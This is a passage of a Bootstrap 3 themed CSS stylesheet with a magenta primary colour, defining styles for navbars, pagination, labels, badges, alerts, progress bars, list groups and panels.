.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0px;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
  padding: 0 5px;
  color: #999999;
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0px;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  line-height: 1.42857143;
  text-decoration: none;
  color: #db00af;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  margin-left: -1px;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  color: #8f0072;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #db00af;
  border-color: #db00af;
  cursor: default;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  background-color: #ffffff;
  border-color: #dddddd;
  cursor: not-allowed;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-bottom-left-radius: 0px;
  border-top-left-radius: 0px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-bottom-right-radius: 0px;
  border-top-right-radius: 0px;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  list-style: none;
  text-align: center;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  background-color: #ffffff;
  cursor: not-allowed;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #db00af;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #a80086;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  color: #ffffff;
  line-height: 1;
  vertical-align: baseline;
  white-space: nowrap;
  text-align: center;
  background-color: #999999;
  border-radius: 0px;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #db00af;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding: 40px 20px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  border-radius: 0px;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding: 64px 0;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #db00af;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0px;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  background-color: #fcf8e3;
  border-color: #faebcc;
  color: #c09853;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  overflow: hidden;
  height: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #db00af;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  zoom: 1;
  overflow: hidden;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  margin-bottom: 20px;
  padding-left: 0;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0px;
  border-bottom-left-radius: 0px;
}
a.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
  text-decoration: none;
  color: #555555;
  background-color: #f5f5f5;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  background-color: #eeeeee;
  color: #999999;
  cursor: not-allowed;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #db00af;
  border-color: #db00af;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ffa8ee;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
a.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
a.list-group-item-success.active:hover,
a.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
a.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
a.list-group-item-info.active:hover,
a.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
a.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
a.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0px;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1px;
  border-top-right-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1px;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1px;
  border-bottom-right-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1px;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  border: 0;
  margin-bottom: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0px;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #db00af;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #db00af;
  border-color: #db00af;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #db00af;
}
.panel-primary > .panel-heading .badge {
  color: #db00af;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #db00af;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
